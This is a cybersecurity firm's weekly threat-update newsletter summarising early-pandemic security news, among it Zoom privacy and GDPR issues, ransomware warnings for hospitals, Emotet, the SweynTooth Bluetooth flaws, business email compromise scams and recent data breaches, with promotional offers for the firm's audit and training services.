Search
  • Avantia Threat Update

ZOOM 'S SECURITY & PRIVACY VIOLATED


Zoom's Security and Privacy Woes just keep coming.

This Past Week: Zoom’s Security violated causing security issue; Microsoft warns hospitals of impending Ransomware attack; Emotet Malware shuts down Microsoft’s entire network by overheating PC’s; Bluetooth related flaws threaten dozens of medical devices; Remote work is not new - but its the ‘new normal’; FBI expects increase in COVID-19 Themed BEC Scams; Ransomware slows COVID-19 treatment development; Malware targets online shoppers; Phishing scams jump by 667% in a month and Major Breaches in UNITED STATES; UNITED KINGDOM; CANADA & AUSTRALIA.


Dark Web ID Trends:

Top Source Hits: ID Theft Forums

Top Compromise Type: Domain

Top Industry: Medical & Healthcare

Top Employee Count: 11 - 50

________________________________________________________________________


ZOOM’S SECURITY & PRIVACY WOES VIOLATED - EXPERT SAYS:

Home working and learning has led to a boom in videoconferencing, with Zoom a major beneficiary. But concerns over privacy and security raise important questions: is Zoom safe, and is it even GDPR compliant? The General Data Protection Regulation (GDPR) is a legal framework that sets guidelines for the collection and processing of personal information from individuals who live in the European Union (EU). Security concerns revolve around the recent discovery of several vulnerabilities taken with the length of time it has taken Zoom to fix earlier vulnerabilities. Privacy concerns focus on a lack of transparency around the user or meeting data retained by Zoom, and who else has access to it. We will concentrate on the privacy issues in this article. Data retention and third-party access concerns are typified by the recent discovery that the Zoom iOS app had been passing data to Facebook even where the iOS user had no Facebook account. There was no indication in Zoom's privacy policy that this was happening (Zoom has stopped this, but iOS users will need to download the latest app version to prevent it continuing). There are two concerns here: the lack of transparency and the distribution of information to a third party without user consent. "This is a clear breach of GDPR," Tara Taubman-Bassirian, a French-born, London-Based lawyer and privacy advocate, told SecurityWeek. "With the lack of transparency, the host holds many capabilities that are unknown to the participant, such as recording and further broadcasting." The consent issue is a complex one, which will require careful consideration by Zoom if it is to be solved. GDPR holds that consent for collecting personal data must be freely given, and that if there is an imbalance of power between the parties, it cannot be a free choice and that any consent obtained is invalid. There is already a precedent for this. In September 2019, a school in Sweden was fined $20,000 for using facial biometrics to track 22 students. The parents had given their consent, but the data protection regulator ruled, "consent was not a valid legal basis given the clear imbalance between the data subject [the students] and the controller [the school]." There is the potential for this same argument to be used in the current work from home environment, for both office workers and schoolchildren. Any invitation to a teleconference is effectively an instruction with an imbalance of power and little realistic option to decline. It is possible that many COVID-19 instigated teleconferences are being held in contravention of GDPR's consent rules. Zoom describes itself as the data processor rather than the data controller (which is the host). If this argument is supported by the GDPR data regulators, and the meeting hosts keep a recording of the meeting on their own servers, it means that the host is responsible for the data under GDPR.  This is an important aspect that might not be recognized by the hosts. Valid consent becomes even more important, and it should, suggests Taubman-Bassirian, "be of the higher standard as data collected and recorded are biometrics capable of identifying individuals" -- and in some cases will include children. Zoom appears to be making efforts to solve the issues that have been raised over the last few weeks. In a blog published Wednesday, it says, "We are looking into each and every one of them and addressing them as expeditiously as we can. We are committed to learning from them and doing better in the future." One immediately welcome statement is "we do not sell our users' data, we have never sold user data in the past, and have no intention of selling users' data going forward." The blog explains the pressure the company is under. Where last year the maximum number of daily meeting participants was around 10 million, it is now more than 200 million, which now includes 90,000 schools across 20 countries. But the issues pre-exist the current surge in use -- they have not been created by the expansion. Zoom further explains that the platform was designed for business users, and the influx of home workers and schoolchildren has been a surprise. But the need for privacy and security does not differentiate between corporations, individual workers at home, and schoolchildren -- so, neither of these arguments have any bearing on the current issues. Indeed, they rather raise another question since they indicate a lack of privacy by design or default -- which is a requirement under GDPR. One of the improvements Zoom is working on is to improve its transparency and clarity. It has admitted, in a separate blog, that that what it marketed as end-to-end encryption of its services is no such thing. Jarosław Kamiński, principal consultant at F-Secure, explains the relevance. The encryption used means that communication between the Zoom server and the participant is encrypted and not susceptible to a man-in-the-middle attack. "E2E," he continued, "means the communication is encrypted for the whole time and is inaccessible to the vendor. Without end-to-end encryption, a vendor has the technical capability to intercept / record the communication." That doesn't mean the vendor does this; but Zoom doesn't specify that it doesn't. Zoom is also introducing a new transparency report. This is very welcome. The firm says it is, "Preparing a transparency report that details information related to requests for data, records, or content." Notice the word 'content'. An updated privacy policy issued on March 27 makes it clear that the Zoom cloud will contain recordings of all meetings that the host wishes to be recorded -- so Zoom will always have access to some meetings' content. What it doesn't say is that it does not store any other meetings' content. We know that since it does not use end-to-end encryption, it can intercept and store everything. We don't know whether it does, nor how long it retains the content it says it stores. This raises another question, since Zoom says clearly that it obeys national laws for government access to content. But Zoom is global in operation, which means that via the CLOUD Act, the U.S. government will have access to foreign data. This is worth considering, since apart from possibly sensitive commercial information, that content might even include confidential foreign government data.  On March 27, UK Prime Minister Boris Johnson tweeted that he had just, hours earlier, "chaired the first ever digital Cabinet". The screenshot he shared makes it clear it was held on Zoom, and even shows the Zoom meeting ID number. Disclosing the ID number is not as concerning here as it might immediately appear because the meeting had finished and there was no chance for 'zoombombing' by third parties.  F-Secure senior researcher Andy Patel explained 'zoombombing'. "A Zoom meeting ID is a relatively short numerical string that can likely be guessed or brute forced. By constructing an URL to potential meetings (by synthesizing the URL -- usually just the Zoom URL, possibly expanded with the customer name, with the ID appended), someone can find and join meetings that aren't password protected, even if they weren't invited," he told SecurityWeek. "As an extra bonus, some people have been posting screenshots from their Zoom meetings that include the ID, so when people find those, they all pile into the open meeting." However, in our current example, we do not know whether the host (either Boris Johnson or the Cabinet Office) asked for a copy to be kept by Zoom for future reference, or whether Zoom kept a copy by default. In either case, US intelligence agencies now could demand access to everything said within the meeting. It would be natural to expect that the UK's cyber guardians -- in particular, the Cabinet Office and the NCSC -- would have ensured Zoom's privacy and security before allowing the prime minister to go digital. SecurityWeek asked both offices for clarification, but got none. The Cabinet Office did not answer our questions, but provided two unrelated comments, "National Cyber Security Centre guidance shows there is no security reason for Zoom not to be used for meetings of this kind." It also said, "The MoD [referring to false reports that the MoD had banned the use of Zoom] uses Zoom to conduct cross-government meetings for official level business. There are no plans to review this." The implication is that the NCSC has examined Zoom and found it adequate. This doesn't seem likely, since the only comment provided by the NCSC, so far, firmly passes the buck back to the Cabinet Office: "Cabinet Office are leading the response on Zoom, so for a statement I'd recommend getting in touch with press office via [their email address]." Whether the NCSC has conducted its own tests on Zoom or not, there nevertheless seems sufficient privacy issues (past and present) to wonder if Zoom is adequately GDPR (or the UK's Data Protection Act implementation of GDPR) compliant. Here SecurityWeek asked the Information Commissioner's Office for a comment. The reply was this: ""The coronavirus pandemic has led to a rise in use of video conferencing tools as a valuable way for people to communicate. Any such technology must be transparent with users about how their data will be processed, as well as giving users choice and control. At this stage we are considering various concerns that have been raised regarding video conferencing apps." There is no specific reference to Zoom, but we can assume that it is high on the list of videoconferencing tools being considered. Other European data processing regulators are likely to be doing similar. On the surface it would appear that Zoom has a case to answer -- but Zoom hosts must also consider their own exposure as data controllers -- especially regarding the valid consent issue. Whether Zoom should be investigated -- or even fined if found to be in violation -- is a different question. "It is my opinion," Brittany Roush, Director at the Crypsis Group, told SecurityWeek, "that having that kind of flexibility to ensure that critical services can carry on, especially in a crisis, does not take the teeth from the CCPA and GDPR. If anything, it demonstrates that the regulatory bodies are carrying out their essential function -- which is to ensure that companies protect consumer data... In many ways, the CCPA and GDPR should take a page from HIPAA, which lowered security standards for Telehealth in order to manage the critical healthcare demands of the pandemic... we do not have the luxury of time on our side to devise perfect solutions."


MICROSOFT WARNS HOSPITALS OF IMPENDING RANSOMWARE ATTACKS

Microsoft this week sent targeted warnings to dozens of hospitals that it believes are vulnerable to impending ransomware attacks. On April 1, Microsoft's Threat Protection Intelligence Team published the blog titled, 'Microsoft works with healthcare organizations to protect from popular ransomware during COVID-19 crisis: Here's what to do,' which states that Microsoft threat intelligence sources "identified several dozens of hospitals with vulnerable gateway and VPN appliances in their infrastructure." Microsoft said it sent "a first-of-its-kind targeted notification" to the hospitals about their vulnerable gateway and VPN deployments, warning them that ransomware threat actors are currently scanning the internet for such vulnerabilities. While there's been an increase in social engineering attacks amid the COVID-19 pandemic, Microsoft said it's seen evidence of more sophisticated and dangerous threat activity, which could put hospitals and healthcare organizations in jeopardy at a critical time. "We're seeing not just a rise in COVID-themed typical phishing/malware lure emails, but an uptick in the attempted compromise of legitimate services, such as healthcare and technology providers. Attackers are masquerading as these trusted entities using their services as a relay to get to users. Some of them are more sophisticated operations impersonating an individual/organization in need for several days," a Microsoft spokesperson said. "We have seen attackers with many motivations utilize these human-operated ransomware style vulnerabilities, including to target hospitals." According to the Microsoft Threat Protection Intelligence blog titled 'Human-operated ransomware attacks: A preventable disaster,' these type of attacks "are known to take advantage of network configuration weaknesses and vulnerable services to deploy devastating ransomware payloads." "In these hands-on keyboard attacks, which are different from auto-spreading ransomware like WannaCry or NotPetya, adversaries employ credential theft and lateral movement methods traditionally associated with targeted attacks like those from nation-state actors. They exhibit extensive knowledge of systems administration and common network security misconfigurations, perform thorough reconnaissance and adapt to what they discover in a compromised network," the blog post said. One adversary known to exploit gateway and VPN vulnerabilities is the ransomware group, REvil, also known as Sodinokibi. Microsoft has been tracking the group as part of a broader monitoring of human-operated ransomware attacks. "As organizations have shifted to remote work in light of the pandemic, we're seeing from signals in Microsoft Threat Protection Services (Microsoft Defender ATP, Office 365 ATP and Azure ATP) that the attackers behind the REvil ransomware are actively scanning the internet for vulnerable systems," Microsoft Threat Protection Team wrote in the blog. "Our intel on ransomware campaigns shows an overlap between the malware infrastructure that REvil was observed using last year and the infrastructure used on more recent VPN attacks. This indicates an ongoing trend among attackers to repurpose old tactics, techniques and procedures for new attacks that take advantage of the current crisis." According to the blog, once REvil is successful with an exploitation, "attackers steal credentials, elevate their privileges and move laterally across compromised networks to ensure persistence before installing ransomware or other malware payloads." Emsisoft threat analyst Brett Callow provided SearchSecurity with information that showed a healthcare organization was recently attacked by REvil; several ransomware groups recently pledged not to attack healthcare and medical facilities during the pandemic, though REvil was not one of those groups. REvil employs human-operated attack methods to target organizations that are most vulnerable to disruption, ones that haven't had the time or resources to install the latest patches or update firewalls, according to the Microsoft. Threat actors can remain undetected in networks, sometimes for months on end. "We recommend to hospitals that they prioritize patching any open VPN and gateway vulnerabilities, as attackers are actively taking advantage of them as people work and access information remotely," a Microsoft spokesperson said. Since the release of the blog on April 1, Microsoft said it hareceived replies from healthcare organizations asking for additional information and resources.


EMOTET MALWARE SHUT DOWN MICROSOFT’S ENTIRE NETWORK BY OVERHEATING PC’S

Emotet is one of the notorious malware wreaking havoc across industries by hacking systems. In that latest attack, it took down an entire network of Microsoft by overheating computers. According to a report by Microsoft Detection and Response Team (DART), Emotet tricked one Microsoft employee into opening a malicious email attachment. A series of events that followed led to a week-long shut down of the organization’s core services by maxing out CPUs. How was the attack executed? Emotet malware managed to evade all detection systems as it is regularly controlled by the attacker’s command and control (C2C) server. Five days after the employee’s credentials were extracted by the phishing email attachment, the Emotet payload was delivered and executed on Fabrikam’s (an alias used for the victim by Microsoft in its case study) PCs. Soon, malware actors started targeting more employees of Fabrikam and their external contacts using stolen credentials and more systems were affected. The malware took over the control of the entire network by gaining access to the admin account. Within 8 days since the email attachment was first opened, the entire network crashed despite the best efforts from the IT department of the entity. All the PCs connected to the network started experiencing overheating, freezing, abrupt shutdowns and reboot due to Blue Screen of Death. Emotet malware also chugged all the bandwidth thus slowing down the internet connection of the network. DART’s case study mentions: “When the last of their machines overheated, Fabrikam knew the problem had officially spun out of control. We want to stop this hemorrhaging.” The entire network was brought down to its knees including the 185-surveillance camera network due to Emotet malware. “Emotet consumed the network’s bandwidth until using it for anything became practically impossible. Even emails couldn’t wriggle through,” reads the report. Containment Efforts: 8 days after the first system froze, Microsoft’s cybersecurity team DART was called to Fabrikam. They controlled the malware attack by using buffer zones that isolated assets with admin privileges. They also uploaded new antivirus signatures and installed Microsoft Defender ATP and Azure ATP to get rid of the malware completely. Since Emotet paralyzed their own network, Microsoft recommends users to deploy email filtering tools to avoid potential phishing attacks and multi-factor authorization to evade illegal access to the system.


BLUETOOTH RELATED FLAWS THREATEN DOZENS OF MEDICAL DEVICES

Hundreds of smart devices—including pacemakers—are exposed thanks to a series of vulnerabilities in the Bluetooth Low Energy protocol. BLUETOOTH is used in everything from speakers to implanted pacemakers, which means that Bluetooth-related vulnerabilities can affect a dizzying array of devices. In the latest instance, a newly discovered round of 12 Bluetooth bugs potentially exposes more than 480 devices to attack, including fitness trackers, smart locks, and dozens of medical tools and implants. Researchers from Singapore University of Technology and Design began developing techniques for analyzing Wi-Fi security in January 2019, and later realized they could apply those same methods to assess Bluetooth as well. By September they had found their first bug in certain implementations of Bluetooth Low Energy, the version of the protocol designed for devices with limited resources and power. Within weeks, they had found 11 more. Collectively dubbed "SweynTooth," the flaws exist not in BLE itself, but in the BLE software development kits that come with seven "system on a chip" products—microchips that integrate all of a computer's components in one place. IoT manufacturers often turn to off-the-shelf SoCs to develop new products quickly. That also means, though, that SoC implementation flaws can propagate across a wide variety of devices. The SweynTooth bugs can't be exploited over the internet, but a hacker within radio range could launch attacks to crash targeted devices entirely, disable their BLE connection until a restart, or in some cases even bypass BLE's secure pairing mode to take them over. In addition to all manner of smart home and enterprise devices, the list includes pacemakers, blood glucose monitors, and more. "We were quite surprised to find these kinds of really bad issues." As problematic as the vulnerabilities could be in smart home devices or office equipment, the stakes are clearly higher in the medical context. The researchers did not develop proof of concept attacks against any of the potentially vulnerable medical devices, but the relevant SoCs contain bugs that could be used to crash the communication functions or the whole device. Manufacturers will need to individually test each of their products that rely on a vulnerable SoC to determine which attacks would be feasible in practice and what patches are necessary. And the researchers note that it's important for manufacturers to consider how an attacker could chain the SweynTooth vulnerabilities with other possible remote access attacks to cause even greater harm. Any device that wants to advertise Bluetooth as a feature and use the Bluetooth logo goes through a certification process to ensure interoperability across devices. In this case, though, the SoC manufacturers missed some basic security red flags. "We were quite surprised to find these kinds of really bad issues in prominent vendors," says Sudipta Chattopadhyay, an embedded systems researcher who oversaw the work. "We developed a system that found these bugs automatically. With a little bit more security testing they could have found it as well." The Bluetooth Special Interest Group, which oversees development of the Bluetooth and BLE standards, did not a return a request from WIRED for comment about the findings. Bluetooth and BLE implementation issues are common, though, partly because the Bluetooth and BLE standards are massive and complex. "Some of the vendors we contacted originally, the engineers said, 'Well, the reason you're getting these issues is that you're putting in values that are not expected, not within the specification,'" Chattopadhyay says. "But you can't only be testing for a benign environment. We're talking about an attacker here. He doesn’t care about what's expected." The researchers notified seven SoC makers about the vulnerabilities. Texas Instruments, NXP, Cypress, and Telink Semiconductor have all released patches already. Dialog Semiconductors has released updates for one of its SoC models, but has more coming for other models in a few weeks. STMicroelectronics recently confirmed the researchers' findings but has not developed patches yet, and Microchip does not currently seem to have patches in the works. Even when the SoCs release updates to their BLE software development kits to plug the holes, though, the challenge is that each individual manufacturer that uses any of the seven affected SoCs still needs to take those patches, adapt them to their particular products, and convince customers to install them.

"Imagine the time it takes for a single pacemaker to get an update and the kind of process to update it in the field," says Ben Seri, who has found similar chip-level BLE implementation issues and is vice president of research at the embedded device security firm Armis. "It’s not something that happens quickly or easily. For all of these affected devices, they either won't be patched at all or will require huge effort to be updated.” The researchers emphasize that even more products than the hundreds they've already identified are likely vulnerable, because it's difficult to know where manufacturers have used impacted SoCs. Now that the SweynTooth findings are public, it's possible that more vulnerable SoCs will come to light as well as the Singapore University of Technology and Design group and other researchers around the world continue investigating. "The FDA is assessing the SweynTooth Bluetooth Low Energy chipset vulnerabilities," an agency spokesperson told WIRED. "The FDA continues to assess new information concerning emergent cybersecurity vulnerabilities and will keep the public informed if significant new information becomes available." The vulnerabilities are difficult to exploit in practice, and expose different devices to different degrees. But they underscore just how critical chip-level security is, especially when those chips are broadly outsourced—not to mention how long it takes to fix these problems when they arise in IoT.


REMOTE WORK IS NOT NEW, BUT ITS THE NEW NORMAL:

Due to Coronavirus (COVID-19) outbreak, we have seen a huge shift with many people who typically spend 40 or more hours a week in the office now working from home and having to adjust in an accelerated timeframe. We’ve seen plenty of articles sharing advice on how you can be effective working at home and the like, but what experienced remote workers – and often the authors of these pieces – forget is that this is uncharted territory for most. Being forced to work from home without advanced notice to properly prepare can be a real challenge. To put it simply, this new norm is disruptive. The challenge now is that 50 percent or more of us are spending the whole week at home – and online. This is putting additional pressure on corporate IT and the IT teams who need to scale up services fast are working harder than ever to ensure a good user experience. Here are a few simple suggestions that may help during this time of change.

Stay off the (corporate) network

When we work from home, most of us will use a VPN (Virtual Private Network). It makes our work computer behave as if we are in the office, saves on extra authentication and, in some cases, is the only way to access corporate information. However, a VPN is also a chokepoint into the network and too many users can slow down access. It’s likely that some software like email does not require a VPN and other applications may be accessible externally with additional authentication or using a multi-factor token. As a reminder, in most organisations, the VPN is designed to protect access to business services. General online activities, such as banking and social media, are not affected. If your corporate policy allows it, don’t automatically load the VPN when you start work – use it when needed and unload when you don’t.

Working at home carries additional (online) risks

In the office, we are protected by a corporate security bubble – our employers invest heavily to ensure that the right solutions are in place to protect data and keep threats on the outside. As home workers, our corporate device will still carry a level of protection, but the risks are heightened by the environment. For this reason, security awareness is an important consideration. A corporate awareness program provides much needed information for workers. Beyond being part of an employee on-boarding process, this program should be continually updated and mandated with refresher training. One simple suggestion that goes beyond a program is to provide regular mini updates on what’s happening in the world of SCAMS and malware. This keeps employees up-to-date and, in return, they are more likely to share with friends, family and contacts, if the information is presented in an informative and easily digestible way. The onus is also on us to take extra responsibility applying corporate awareness to our own environments. There are plenty of distractions when working from home; children, deliveries, a sunny patio or a walk with the dog at lunchtime. The bad guys know this and will have malware targeted toward broadband connections, looking for remote workers on their home network.


• Watch for SCAM text messages with seemingly helpful links to more information. If you were not expecting the message and do not recognize the number, never click on the link.

• Keep a watchful eye on phishing and SPAM emails. Even something that appears to come from someone you know could be a fake. If you’re unsure about an email, take a look at this recent article on spotting phishing attacks. 


Learning from Experience 

People who work remotely are less visible with colleagues and management, often leading them to overwork. This is a common mistake and can lead to burn out or reduced overall quality of work. Our working habits certainly change when we’re away from the office, but this can be for the better. Here are a few tips for those working from home.


1. We are often more productive at home. Think about the distractions of a day in the office: coffee machine chats, smoke breaks, shuffling from room to room for meetings, etc. How much time do these activities take when added up? Your working day should reflect a day in the office, don’t be chained to the desk…exercise, make coffee and enjoy the experience.

2. When setting up conference calls for a remote audience, try not to put them to the top of the hour. That’s when everyone does it, making it more likely to cause issues with connectivity. Rather than a 10:00 a.m. call, try 10:15 and schedule it for 45 minutes rather than an hour. This accounts for what would be the walking time between meeting rooms and will give you a small break.

3. Have a non-work chat. This is so important. In the office, we regularly take time to chat with a colleague about their evening or maybe plans for the weekend – why not do the same from home, but with a 15-minute video catch up? You’d be surprised what a lift it can give to your well-being and mood.


Working remotely should be a positive experience. You may be able to get more done in a day (work-related and not) and, by avoiding the daily commute, will end the day in a much better frame of mind. We’re all in the same boat for the foreseeable future – we can make the most of it by understanding the risks and giving everyone (including ourselves) a little grace.


FBI EXPECTS INCREASE IN COVID-19 THEMED BEC SCAMS

The Federal Bureau of Investigation is expecting an increase in the frequency of scams related to the current COVID-19 pandemic, including those involving Business Email Compromise (BEC). BEC scams are a type of fraud targeting those in charge of an organisations finances, ordering legitimate funds transfers for a customer company to trick unsuspecting victims into sending money to the attackers. In BEC attacks, the victim typically receives an email apparently arriving from a company they normally conduct business with, requesting payments be made to a new account, or demanding a change in the standard payment operations. According to the FBI, losses in the USA surpassed $1.7 billion in 2019, and are only expected to increase. More recently, there has been an increase in BEC attacks targeting municipalities purchasing personal protective equipment or other supplies for the ongoing coronavirus crisis. One of the most recent examples of BEC fraud targeted a financial institution with an email allegedly arriving from the CEO of a company and related to a previously scheduled transfer of $1 million. The message requested the transfer date be moved up and to a new account, due to the COVID-19 situation. In another incident, a bank customer received a message from an alleged client in China, requesting that all invoice payments be changed to a different bank, claiming that their regular accounts could not be accessed due to audits. Several transfers were made to the new bank before the fraud was discovered. To stay protected from this type of fraud, organizations should look for specific red flags, including an unexplained urgency, last minute changes in wire details or in established communication platforms, refusal to communicate via telephone or online voice/video services, requests for advanced payment of services if previously such payment was not required, and requests to change direct deposit information. According to the FBI, being skeptical of any last minute changes in wiring instructions and verifying all such changes via the contact on file could help avoid falling victim to fraud. To stay protected, users should also make sure that URLs in emails are associated with the business they claim to be from, should be wary of hyperlinks that may contain misspellings of the actual domain name, and should verify the email address used to send emails. Immediately after discovering that they might have fallen victim to a fraudulent incident, users should contact their financial institution to request a recall of funds, and should also report the issue to the employer. Victims are advised to also file a complaint with the FBI’s Internet Crime Complaint Center or the equivalent in their country as soon as possible.

______________________________________________________________________________


THREAT FOCUS: Social Bluebook - UNITED STATES

https://techcrunch.com/2020/03/27/social-bluebook-hacked/


Exploit: Unauthorized database access 

Social Bluebook: Social media platform  

Risk to Small Business: 2.117 = Severe Cybercriminals exfiltrated a company database containing personal information from thousands of internet influencers. Embarrassingly, the breach, which occurred in October 2019, was identified by TechCrunch reporters who were sent a copy of the stolen database. In a statement, the company claimed to be ignorant of the breach, raising serious questions about the efficacy of its cybersecurity strategy. This incident is likely to have significant blowback from well-connected influencers on social media and invite regulatory scrutiny on many fronts. Individual Risk: 2.122 = Severe The stolen database contains account information for 217,000 users. This includes names, email addresses, and hashed and scrambled passwords. Those impacted by the breach should immediately update their login credentials for this website and any other service using the same information, plus closely monitor their accounts for unusual or suspicious activity.  

Customers Impacted: 217,000

Effect On Customers: Hackers frequently target social media influencers because of their large public following. Therefore, companies catering to this clientele need to be prepared to protect their users’ valuable personal data. If they can’t, these influencers will almost certainly tell their followers all about it, a principle that applies to a growing number of consumers in every sector.

Risk Levels:

1 – 1.5 = Extreme Risk

1.51 – 2.49 = Severe Risk

2.5 – 3 = Moderate Risk

*The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & Huntsman Digital Auditor to the Rescue: Helping SME’s to understand the importance of security is no easy task. With an ‘Essential8’ Digital Security Audit we offer a remote access, independent ‘real time’ audit of our clients critical operational infrastructure systems to determine where the gaps are with recommendations for remediation.

Its the first step to real cyber security. Call Avantia’s office on 07 30109711 or visit: https://www.avantiacybersecurity.com/cyber-security-audit

THREAT FOCUS: Ozark Orthopedics - UNITED STATES

https://ryortho.com/breaking/ozark-orthopaedics-data-breach-exposes-over-15000-patients/


Exploit: Phishing scam Ozark Orthopedics: Orthopedic healthcare practice

Risk to Small Business: 2.113 = Severe Four employees fell for a phishing scam and gave hackers access to email accounts containing patient data. The scope of the data breach that occurred in late 2019 was just released by the healthcare provider, creating questions about the practice’s cybersecurity practices. As a result, patients were unable to quickly take steps to protect their identities and Ozark Orthopedics has opened itself up to regulatory scrutiny that could result in substantial financial penalties.

Individual Risk: 1.775 = Severe Patients’ personally identifiable information was exposed in the breach, including their names, treatment information, Medicare or Medicaid identification numbers, Social Security numbers, and financial account information. In the wrong hands, this information can be used in a litany of financial or identity-related crimes. Those impacted by the breach should immediately enroll in credit and identity monitoring services to secure their personal information.    

Customers Impacted: 15,240

Effect On Customers: More than a trillion phishing emails are sent each year, some of which will inevitably make their way into your employees’ inboxes. Training employees to spot these scams is especially important to protect your company from a devastating data breach.

Risk Levels: 1 – 1.5 = Extreme Risk

1.51 – 2.49 = Severe Risk

2.5 – 3 = Moderate Risk

*The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & ID Agent to the Rescue: BullPhish ID simulates phishing attacks and conducts security awareness training campaigns to educate your employees, making them the best defense against cybercrime. For more information call 07 30109711 (Office Hours) or Click the link to get started: https://www.avantiacybersecurity.com/overwatch


THREAT FOCUS: 10X Genomics Inc. - UNITED STATES

https://www.cyberscoop.com/covid-19-ransomware-10x-genomics-data-breach/


Exploit: Ransomware

10x Genomics Inc.: Biotechnology company

Risk to Small Business: 2.206 = Severe A ransomware attack disrupted operations at the biotechnology company, which is currently acting as part of a consortium working to quickly develop a treatment for COVID-19. Before encrypting IT, hackers exfiltrated company data. Although the company reports “no material day-to-day impact,” it’s unclear what the implications are for the stolen data or how this could impact its development of a COVID-19 treatment.  

Individual Risk: At this time, no personal information was compromised in the breach.  

Customers Impacted: Unknown

Effect On Customer: Companies in every sector have seen an uptick in cybersecurity threats as COVID-19 disrupts business-as-usual and puts many people on edge. This is especially true for the healthcare industry, which is experiencing a deluge of ransomware attacks, phishing scams, and other threats at a critical time.

Risk Levels: 1 – 1.5 = Extreme Risk

1.51 – 2.49 = Severe Risk

2.5 – 3 = Moderate Risk

*The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & ID Agent to the Rescue: BullPhish ID simulates phishing attacks and conducts security awareness training campaigns to educate your employees, making them the best defense against cybercrime. For more information call 07 30109711 (Office Hours) or Click the link to get started: https://www.avantiacybersecurity.com/overwatch


THREAT FOCUS: GoDaddy - UNITED STATES   

https://krebsonsecurity.com/2020/03/phish-of-godaddy-employee-jeopardized-escrow-com-among-others/?web_view=true


Exploit: Phishing scam  

GoDaddy: Internet domain registrar

Risk to Small Business: 2.313 = Severe A spear phishing attack tricked a customer service employee into providing information that ultimately allowed hackers to view and modify customer records. As a result, several GoDaddy clients, including Escrow.com, which provides escrow services for several prominent websites, were impacted. The breach will have costly implications for both GoDaddy and its customers, who will have to decide if they want to continue partnering with a company that puts their sensitive data at risk.  

Individual Risk: At this time, no personal information was compromised in the breach. 

Customers Impacted: Unknown

Effect On Customers: Today’s online ecosystem is vast and interconnected. This incident is a reminder that failures at other companies can have significant implications for your own, which increases the importance of securing accounts to buttress your IT infrastructure against potential failure at third-party contractors. With simple cybersecurity features, like two-factor authentication, company accounts remain secure even when credentials or login information is exposed.

Risk Levels: 1 – 1.5 = Extreme Risk

1.51 – 2.49 = Severe Risk

2.5 – 3 = Moderate Risk

*The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avanti Cyber Security & ID Agent to the Rescue: With Passly, get the secure identity and access management solutions that you need to protect your systems and data in today’s remote work landscape at a price that you can afford, including multi-factor authentication, single sign-on, and secure password storage. Find out more by phoning Avantia on 07 30109711 or Click the link to get started: Click the link to get started: https://www.avantiacybersecurity.com/overwatch

THREAT FOCUS: The Beer Store - CANADA

https://www.itworldcanada.com/article/some-ontario-beer-chain-outlets-forced-to-use-cash-only-after-cyber-attack/429003


Exploit: Malware attack

The Beer Store: Retail store outlets

Risk to Small Business: 2.187 = Severe: Cybercriminals infiltrated The Beer Store’s website and injected payment skimming malware into its online store. The online store allowed customers to place orders for pickup or delivery, two critical features as social distancing measures keep shoppers at home. This breach removed The Beer Store’s ability to accept payments via credit card, which could significantly impact its bottom line during this already challenging time.

Individual Risk: 2.311 = Severe Although the company quickly detected the intrusion and closed its online store, anyone who made an online purchase before the threat was identified likely had their payment credential compromised – including all sensitive identification and financial information entered during the checkout process. Those impacted should notify their financial institutions of the breach while also taking steps to secure their accounts and personal details from misuse.

Customers Impacted: Unknown

Effect On Customers: Customers are increasingly unwilling to do business with companies that can’t protect their personal information. At the same time, privacy regulators are backing them up, collectively ensuring that companies have millions of reasons to execute on this mission critical priority.

Risk Levels:

1 – 1.5 = Extreme Risk

1.51 – 2.49 = Severe Risk

2.5 – 3 = Moderate Risk

*The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & Huntsman Digital Auditor to the Rescue: Helping SME’s to understand the importance of security is no easy task. With an ‘Essential8’ Digital Security Audit we offer a remote access, independent ‘real time’ audit of our clients critical operational infrastructure systems to determine where the gaps are with recommendations for remediation.

Its the first step to real cyber security. Call Avantia’s office on 07 30109711 or visit: https://www.avantiacybersecurity.com/cyber-security-audit

THREAT FOCUS SOS Online Backup - UNITED KINGDOM

https://www.securitymagazine.com/articles/92042-data-breach-report-cloud-backup-provider-exposes-more-than-135-million-customer-records